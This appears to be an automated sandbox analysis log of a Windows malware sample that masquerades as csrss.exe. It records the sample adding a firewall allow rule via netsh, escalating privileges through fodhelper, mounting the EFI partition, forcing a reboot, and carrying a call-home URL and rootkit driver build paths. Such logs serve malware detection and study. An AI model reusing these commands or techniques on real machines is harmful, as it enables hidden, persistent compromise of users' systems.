Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"	Jump to behavior
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe /301-301	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5384 -ip 5384	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5384 -s 996	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\rss\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\1dyvctHqv1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\1dyvctHqv1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'emptysmoke.exe'

Source: C:\Windows\rss\csrss.exe

File created: C:\Users\user\AppData\Local\Temp\csrss

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_01
Source: C:\Windows\rss\csrss.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \BaseNamedObjects\Local\SM0:7116:64:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3836:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01

Source: 1dyvctHqv1.exe	String found in binary or memory: application/app/install.go
Source: 1dyvctHqv1.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: 1dyvctHqv1.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: 1dyvctHqv1.exe	String found in binary or memory: application/app/install.go
Source: 1dyvctHqv1.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: 1dyvctHqv1.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe	String found in binary or memory: application/app/install.go
Source: csrss.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe	String found in binary or memory: application/app/install.go
Source: csrss.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe	String found in binary or memory: application/app/install.go
Source: csrss.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
Source: csrss.exe	String found in binary or memory: application/app/install.go
Source: csrss.exe	String found in binary or memory: application/resilience/btcblockchain/address.go
Source: csrss.exe	String found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume

Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\rss\csrss.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 1dyvctHqv1.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: C:\Windows\System32\fodhelper.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations

Source: C:\Users\user\Desktop\1dyvctHqv1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 1dyvctHqv1.exe

Static file information: File size 4534824 > 1048576

Source: 1dyvctHqv1.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x438e00

Source: 1dyvctHqv1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1dyvctHqv1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1dyvctHqv1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1dyvctHqv1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1dyvctHqv1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1dyvctHqv1.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 1dyvctHqv1.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Loader.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: csrss.exe
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: symsrv.pdb source: csrss.exe
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: .pdb.dbg source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: symsrv.pdbGCTL source: 1dyvctHqv1.exe, 00000000.00000002.297655834.0000000000C55000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.309245222.00000000062A3000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.334492688.0000000006803000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.407197925.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000021.00000003.364615971.0000000006803000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.404493397.0000000000C55000.00000040.00020000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
Source:	Binary string: dbghelp.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
